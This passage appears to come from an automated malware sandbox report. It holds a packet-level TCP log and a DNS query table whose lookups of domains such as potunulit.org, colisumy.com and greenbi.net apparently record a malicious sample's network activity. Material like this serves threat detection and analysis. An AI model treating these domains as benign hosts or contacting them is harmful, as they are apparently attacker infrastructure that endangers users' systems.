Jul 27, 2023 20:19:30.386104107 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386106968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386117935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386147022 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386183977 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386523962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386543989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386559010 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386579990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386599064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386620045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386639118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386645079 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386657953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386666059 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386677980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386698961 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386718988 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386727095 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386738062 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386756897 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386765003 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386775970 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386795044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386799097 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386812925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386827946 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386831999 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386851072 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386869907 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386878967 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386888027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386908054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386912107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386925936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386943102 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.386945009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386965990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.386984110 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387083054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387090921 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387103081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387120962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387145042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387164116 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387181044 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387187004 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387207031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387211084 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387226105 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387233019 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387248039 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387268066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387278080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387288094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387307882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387330055 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387350082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387351990 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387370110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387381077 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387388945 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387401104 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387408018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387428045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387444973 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387445927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387459993 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387474060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387492895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387510061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387530088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387537956 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387550116 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387567043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387584925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387598991 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387598991 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387603998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387623072 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387628078 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387643099 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387661934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387664080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387680054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387690067 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387702942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387721062 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387733936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387749910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387764931 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387779951 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387798071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387815952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387830019 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387833118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387851000 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387860060 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387870073 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387881994 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387888908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387904882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.387933016 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.387970924 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.421650887 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421719074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421770096 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421773911 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.421817064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421864033 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421904087 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.421912909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.421969891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422019958 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422027111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422071934 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422085047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422152042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422214985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422270060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422297001 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422328949 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422332048 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422384977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422447920 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422468901 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422506094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422558069 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422596931 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422642946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422691107 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422729015 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422740936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422785044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422827959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422858000 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422872066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422888994 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.422916889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.422962904 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423007965 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423034906 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423053026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423085928 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423095942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423130989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423176050 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423177958 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423216105 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423218966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423264027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423307896 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423335075 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423351049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423394918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423399925 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423439026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423482895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423508883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423527002 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423572063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423572063 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423615932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423654079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423660040 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423697948 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423746109 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423789978 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423791885 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423832893 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.423835039 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423878908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423939943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.423945904 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424006939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424058914 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424103022 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424124002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424144983 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424145937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424190044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424226046 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424282074 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424375057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424423933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424468040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424473047 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424510956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424511909 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424556017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424598932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424601078 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424644947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424746037 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424752951 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424798012 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424845934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424875975 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424890995 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424926043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.424967051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.424971104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425012112 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425014973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425060034 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425106049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425148964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425153017 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425189972 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425193071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425235987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425278902 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425322056 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425323963 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425364017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425379992 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425409079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425453901 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425498009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425525904 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425542116 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425544024 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425585985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425630093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425643921 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425674915 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425719023 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425736904 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425765991 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425812006 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425822020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425853968 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425899982 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425905943 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.425944090 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.425987959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426014900 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426032066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426069021 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426114082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426141024 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426158905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426188946 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426202059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426244020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426245928 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426290035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426332951 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426352978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426377058 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426415920 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426419973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426464081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426507950 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426549911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426554918 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426593065 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:30.426594019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426636934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426681042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426728010 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:30.426737070 CEST	49770	80	192.168.2.4	188.114.96.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2023 20:18:39.261915922 CEST	192.168.2.4	8.8.8.8	0x6cd3	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:39.594141960 CEST	192.168.2.4	8.8.8.8	0x8ed2	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:45.048520088 CEST	192.168.2.4	8.8.8.8	0xb8ef	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:46.714333057 CEST	192.168.2.4	8.8.8.8	0xa04f	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:48.822870016 CEST	192.168.2.4	8.8.8.8	0xfdd0	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:49.492149115 CEST	192.168.2.4	8.8.8.8	0xe288	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:51.095083952 CEST	192.168.2.4	8.8.8.8	0x24ea	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:54.999452114 CEST	192.168.2.4	8.8.8.8	0x2f5b	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:57.477022886 CEST	192.168.2.4	8.8.8.8	0x2b29	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:57.848258972 CEST	192.168.2.4	8.8.8.8	0xb7c3	Standard query (0)	nordskills.eu	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:18:59.101253033 CEST	192.168.2.4	8.8.8.8	0x4c47	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:01.736969948 CEST	192.168.2.4	8.8.8.8	0xcd9a	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:02.450267076 CEST	192.168.2.4	8.8.8.8	0xf2df	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:04.712771893 CEST	192.168.2.4	8.8.8.8	0x2bde	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:05.008527994 CEST	192.168.2.4	8.8.8.8	0x4e75	Standard query (0)	us.imgjeoigaa.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:05.398377895 CEST	192.168.2.4	8.8.8.8	0xd1fc	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:12.559631109 CEST	192.168.2.4	8.8.8.8	0x933f	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:13.599180937 CEST	192.168.2.4	8.8.8.8	0xc17b	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:16.662337065 CEST	192.168.2.4	8.8.8.8	0x4a19	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:16.711556911 CEST	192.168.2.4	8.8.8.8	0xcc95	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:19.865818024 CEST	192.168.2.4	8.8.8.8	0xf181	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:22.725498915 CEST	192.168.2.4	8.8.8.8	0xa1fa	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:23.335997105 CEST	192.168.2.4	8.8.8.8	0x4e80	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:24.336811066 CEST	192.168.2.4	8.8.8.8	0xb0c6	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.307837963 CEST	192.168.2.4	8.8.8.8	0x2863	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.695905924 CEST	192.168.2.4	8.8.8.8	0x2fef	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.785331964 CEST	192.168.2.4	8.8.8.8	0xa0a1	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.148650885 CEST	192.168.2.4	8.8.8.8	0xc5f8	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.634270906 CEST	192.168.2.4	8.8.8.8	0x3737	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.930114985 CEST	192.168.2.4	8.8.8.8	0xf22b	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.126626015 CEST	192.168.2.4	8.8.8.8	0x639e	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:33.984682083 CEST	192.168.2.4	8.8.8.8	0xf29c	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:33.997337103 CEST	192.168.2.4	8.8.8.8	0xd820	Standard query (0)	shsplatform.co.uk	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004141092 CEST	192.168.2.4	8.8.8.8	0xa001	Standard query (0)	aa.imgjeoogbb.com	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.517919064 CEST	192.168.2.4	8.8.8.8	0x1b15	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.863908052 CEST	192.168.2.4	8.8.8.8	0xb0bb	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.218714952 CEST	192.168.2.4	8.8.8.8	0x9655	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.484235048 CEST	192.168.2.4	8.8.8.8	0x66eb	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.788171053 CEST	192.168.2.4	8.8.8.8	0x797e	Standard query (0)	greenbi.net	A (IP address)	IN (0x0001)	false
